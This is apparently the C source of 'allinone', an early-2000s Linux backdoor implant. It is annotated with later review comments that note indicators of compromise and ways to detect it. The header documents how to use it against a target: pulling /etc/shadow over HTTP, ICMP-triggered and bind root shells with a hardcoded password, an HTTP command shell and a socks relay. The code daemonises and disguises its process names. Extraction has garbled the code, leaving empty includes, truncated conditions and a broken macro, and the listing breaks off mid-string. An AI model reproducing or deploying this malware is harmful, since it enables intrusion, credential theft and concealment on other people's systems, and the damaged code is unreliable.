/************************************************************************
* allinone.c for HUC(2002)
*
* allinone.c is
* a Http server,
* a sockets transmit server,
* a shell backdoor,
* a icmp backdoor,
* a bind shell backdoor,
* a like http shell,
* it can translate file from remote host,
* it can give you a socks5 proxy,
* it can use for to attack, jumps the extension, Visits other machines.
* it can give you a root shell.:)
*
* Usage:
* compile:
* gcc -o allinone allinone.c -lpthread
* run on target:
* ./allinone
*
* 1.httpd server
* Client:
* http://target:8008/givemefile/etc/passwd
* lynx -dump http://target:8008/givemefile/etc/shadow shadow
*
* 2.icmp backdoor
* Client:
* ping -l 101 target (on windows)
* ping -s 101 -c 4 target (on linux)
* nc target 8080
* kissme:) -- your password
*
* 3.shell backdoor
* Client:
* nc target 8008
* kissme:) -- your password
*
* 4.bind a root shell on your port
* Client:
* http://target:8008/bindport:9999
* nc target 9999
* kissme:) -- your password
*
* 5.sockets transmit
* Client:
* http://target:8008/socks/:local listen port::you want to tran ip:::you want to tran port
* http://target:8008/socks/:1080::192.168.0.1:::21
* nc target 1080
*
* 6.http shell
* Client:
* http://target:8008/givemeshell:ls -al (no pipe)
*
* ps:
* All bind shell have a passwd, default is: kissme:)
* All bind shell will close, if Two minutes do not have the connection.
* All bind shell only can use one time until reactivates.
*
*
* Code by lion, e-mail: lion@cnhonker.net
* Welcome to HUC, Http://www.cnhonker.net
*
* Test on redhat 6.1/6.2/7.0/7.1/7.2 (maybe others)
* Thx bkbll's Transmit code, and thx Neil,con,iceblood for test.
*
************************************************************************/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
/*
 * Compile-time configuration of the implant. Every value in this block is
 * fixed in the binary at build time, so the set doubles as a list of host and
 * network indicators for this sample. A rebuilt copy can change any of them,
 * so treat them as indicators for this build only.
 */
/*
 * TCP ports. HTTPD_PORT is the one main() passes to TCP_listen(). The usage
 * notes at the top of the file associate 8008 with the HTTP-style and
 * password-shell service, 8080 with the shell reached after the ICMP trigger,
 * and 1080 with the relay example. BIND_PORT is not referenced in the part of
 * the listing visible here.
 */
#define HTTPD_PORT 8008
#define BIND_PORT 8888
#define ICMP_PORT 8080
#define TRAN_PORT 1080
/*
 * SIZEPACK matches the 101-byte ping size given in the usage notes
 * ("ping -l 101" / "ping -s 101"); presumably icmp_shell() compares the echo
 * payload length against it, but icmp_shell() is not in this part of the
 * listing -- confirm there. For network monitoring, an echo request of that
 * size followed by a TCP connection to ICMP_PORT is the pattern to look for.
 */
#define SIZEPACK 101
#define MAXSIZE 32768
/* TIMEOUT is 120; the usage notes say bind shells close after two minutes idle. */
#define TIMEOUT 120
#define CONNECT_NUMBER 1
/*
 * Strings that main() copies over argv[0] so the process list shows a
 * harmless-looking name. Overwriting argv[0] changes the command line the
 * kernel reports, not the executable path, so comparing /proc/<pid>/cmdline
 * with /proc/<pid>/exe and /proc/<pid>/comm exposes the mismatch.
 */
#define HIDEME "[login] "
#define HIDEICMP "[su] "
#define HIDEFILE "[bash] "
/*
 * Request-path keywords and separators of the HTTP-style command channel, as
 * shown in the usage notes (/givemefile..., /givemeshell:..., /bindport:...,
 * /socks/:...). Useful as match strings for proxy logs or IDS rules on
 * traffic to HTTPD_PORT.
 */
#define GET_FILE "givemefile"
#define SHELL_NAME "givemeshell"
#define BIND_NAME "bindport"
#define TRAN_NAME "socks"
#define DISPART ":"
#define DISPART1 "::"
#define DISPART2 ":::"
/*
 * Static password shared by every shell feature (see the "ps:" notes in the
 * file header). It is a fixed string in the binary and, per the nc examples
 * in the header, is typed over a plain TCP connection.
 */
#define PASSWORD "kissme:)"
/*
 * Banner and prompt text. The trailing "\0" inside each literal is redundant,
 * since a string literal is already NUL-terminated. Where these are sent is
 * not visible in this part of the listing; presumably they appear in clear
 * text on the shell connections -- confirm against bind_shell()/get_shell().
 */
#define MESSAGE "\r\n========Welcome to http://www.cnhonker.net========\r\n==========You get it, have a goodluck. :)=========\r\n\r\nYour command: \0"
#define GIVEPASS "\r\nEnter Your password: \0"
/*
 * NOTE(review): the macro body below has no operator between "(a)" and "(b)";
 * a comparison operator was most likely lost when the page was extracted, as
 * with the empty #include lines above. It is left exactly as found.
 */
#define max(a, b) (a)(b)?(a) : (b)
/*
 * File-scope state. None of these is used in the part of the listing visible
 * here; daemon_init() declares its own local maxfd, which hides this one.
 * ret_buf is a fixed 32768-byte buffer (the same value as MAXSIZE).
 */
int maxfd, infd, outfd;
unsigned char ret_buf[32768];
int daemon_init(); /* init the daemon, if success return 0 other
void sig_chid(); /* wait the child die */
/*
 * Forward declarations. All of them use an empty parameter list, so the
 * compiler does not check argument counts or types at the call sites; the
 * definitions that are visible later in the listing do take parameters
 * (TCP_listen(int), read_file(char *, int), sig_chid(int)).
 * The definitions of bind_shell, get_shell, icmp_shell, socks, create_socket,
 * create_serv, client_connect, quit, out2in, x2c, unescape_url and
 * plustospace are not in this part of the listing, so the trailing comments
 * below are the author's own descriptions and have not been checked against
 * code.
 * NOTE(review): the comment on TCP_listen says "success return 1", but the
 * definition in this file returns the socket descriptor on success.
 */
int TCP_listen(); /* success return 1 else return -1 */
char * read_file(); /* return the file content as a large string, buf value like GET /index.html HTTP:/1.1 */
ssize_t writen_file(); /* writen data to socket */
int bind_shell(); /* bind a root shell to a port */
int get_shell(); /* get me the root shell */
int icmp_shell(); /* icmp backdoor */
int socks(); /* socks */
int create_socket();
int create_serv();
int client_connect();
int quit();
void out2in();
char x2c(); /* http shell */
void unescape_url();
void plustospace();
/* The main function from here */
/*
 * Entry point: detaches from the terminal, starts the ICMP-triggered
 * component in one process and an accept loop on HTTPD_PORT in another,
 * handing each accepted connection's first request to read_file().
 *
 * NOTE(review): several conditions in this function are cut off ("if(pid",
 * "if(fd", "if((csocket = accept(...))"). The text from a '<' onward appears
 * to have been lost when the page was extracted, so which side of each fork()
 * runs which branch, and what happens on a failed listen or accept, cannot be
 * read from this listing. The code is left exactly as found.
 *
 * What stays observable on a host regardless of those gaps: argv[0] is
 * overwritten with HIDEICMP, HIDEME and HIDEFILE, so the command line shown
 * for these processes will not match /proc/<pid>/exe, and one of them holds a
 * listening TCP socket on HTTPD_PORT.
 */
int main(int argc, char *argv[])
{
int fd, len, i, icmp;
int csocket;
struct sockaddr_in caddr;
char readstr[4000];
char *cbuf;
pid_t pid;
/* make it to a daemon */
/*signal(SIGHUP, SIG_IGN);*/
/* Install the child-reaping handler before any fork() happens. */
signal(SIGCHLD, sig_chid);
daemon_init();
/* Split into two processes; a failed fork() ends the program silently. */
if((pid = fork()) == -1) exit(0);
if(pid
{
/* This branch relabels its command line as HIDEICMP and runs the ICMP component. */
strcpy(argv[0], HIDEICMP);
icmp_shell();
}
/* Open the listening socket on the hard-coded HTTPD_PORT. */
fd = TCP_listen(HTTPD_PORT);
if(fd
for(;;)
{
/* The accepting process relabels its command line as HIDEME on every pass. */
strcpy(argv[0], HIDEME);
/* check httpd */
len = sizeof(caddr);
if((csocket = accept(fd, &caddr, &len))
/* One fork() per accepted connection; on fork failure the loop just continues. */
if((pid = fork()) == -1) continue;
if(pid
{
/* The per-connection process relabels its command line as HIDEFILE. */
strcpy (argv[0], HIDEFILE);
/* A single recv() of at most 4000 bytes is treated as the whole request. */
i = recv(csocket, readstr, 4000,0);
if (i == -1) break;
/* The request is only processed when its last received byte is a newline. */
if( readstr[ i -1 ] != '\n' ) break;
/* NOTE(review): assigns to the array name itself; a subscript was presumably lost in extraction. */
readstr = '\0';
/*printf("Read from client: %s \n", readstr);*/
/* read_file() receives the raw request text and the client socket; its result is not used below. */
cbuf = read_file(readstr, csocket);
close(csocket);
}
close(csocket);
}
close(fd);
return(1);
}
/* init the daemon, if success return 0 other [rest of this comment was lost when the page was extracted] */
/*
 * Detaches the process from its launching terminal using the usual
 * fork / setsid / fork sequence, then resets its working directory, umask and
 * file descriptors. Returns 0 on every path that returns; any fork() result
 * other than 0 (the parent side, or a failure) calls exit(0).
 *
 * NOTE(review): the "if(setsid()" condition and the "for(i=0; i" loop header
 * are cut off, apparently lost at a '<' when the page was extracted. The code
 * is left exactly as found.
 *
 * Host-side traits a responder can expect from the visible calls: working
 * directory "/", a umask of 0, SIGHUP ignored, and the lowest descriptors
 * pointing at /dev/null.
 */
int daemon_init()
{
struct sigaction act;
/* This local maxfd hides the file-scope variable of the same name. */
int i, maxfd;
/* First fork: only the child continues. */
if(fork() != 0) exit(0);
if(setsid()
/* Ignore SIGHUP so the process is not ended by a terminal hang-up. */
act.sa_handler = SIG_IGN;
/*act.sa_mask = 0;*/
act.sa_flags = 0;
sigaction(SIGHUP, &act, 0);
/* Second fork: again only the child continues. */
if(fork() != 0) exit(0);
chdir("/");
/* umask(0): no permission bits are masked on files this process creates. */
umask(0);
/* Upper bound for the descriptor-closing loop below. */
maxfd = sysconf(_SC_OPEN_MAX);
for(i=0; i
close(i);
/*
 * With descriptor 0 free, open() presumably returns 0 and the three dup()
 * calls then yield 1, 2 and 3, all on /dev/null -- this assumes the
 * truncated loop above closed every descriptor; none of the return values
 * is checked.
 */
open("/dev/null", O_RDWR);
dup(0);
dup(1);
dup(2);
return(0);
}
/* wait the child die */
/*
 * SIGCHLD handler, installed by main() with signal(). It calls waitpid() with
 * WNOHANG in a loop to collect exited children without blocking.
 *
 * NOTE(review): the loop condition has no operator between the waitpid()
 * expression and the 0; a comparison operator was presumably lost when the
 * page was extracted. The code is left exactly as found.
 */
void sig_chid(int signo)
{
pid_t pid;
int stat;
/* The trailing ';' gives this loop an empty body. */
while((pid = waitpid(-1, &stat, WNOHANG))0);
/*
 * Because the loop body is empty, this runs once after the loop and prints
 * whatever the last waitpid() call returned. daemon_init() points the
 * standard descriptors at /dev/null, so presumably nothing is shown.
 */
printf("children %d died\n", pid);
return;
}
/* success return 1 else return -1 */
/*
 * Creates a TCP/IPv4 socket, binds it to the given port on every local
 * address (INADDR_ANY) and puts it into the listening state with a backlog
 * of 5.
 *
 * port: TCP port number in host byte order; converted with htons() below.
 *
 * Returns the listening socket descriptor on success (not 1, as the comment
 * above this function says) and -1 when bind() or listen() fails. The result
 * of socket() is not checked, and the descriptor is not closed on the
 * failure paths.
 *
 * Because the bind address is INADDR_ANY, the listener is reachable on all
 * interfaces of the host; a listing such as "ss -ltnp" shows it together
 * with the owning process.
 */
int TCP_listen(int port)
{
struct sockaddr_in laddr ;
int fd;
socklen_t len ;
fd = socket(AF_INET, SOCK_STREAM, 0);
len = sizeof(laddr) ;
/* Zero the address structure before filling in the fields used below. */
memset(&laddr, 0, len) ;
laddr.sin_addr.s_addr = htonl(INADDR_ANY) ;
laddr.sin_family = AF_INET ;
laddr.sin_port = htons(port) ;
/* bind() and listen() return non-zero on failure. */
if((bind(fd, (const struct sockaddr *)&laddr, len))) return(-1);
if(listen(fd, 5)) return(-1);
return(fd);
}
/* http server */
char * read_file(char *buf, int fd)
{
char *erro=
"Content-type: text/html\n\n"
"HTTP/1.1 404 Not Found\n"
"Date: Mon, 14 Jan 2002 03:19:55 GMT\n"
"Server: Apache/1.3.22 (Unix)\n"
"Connection: close\n"
"Content-Type: text/html\n\n"
"\n"
"\n"
"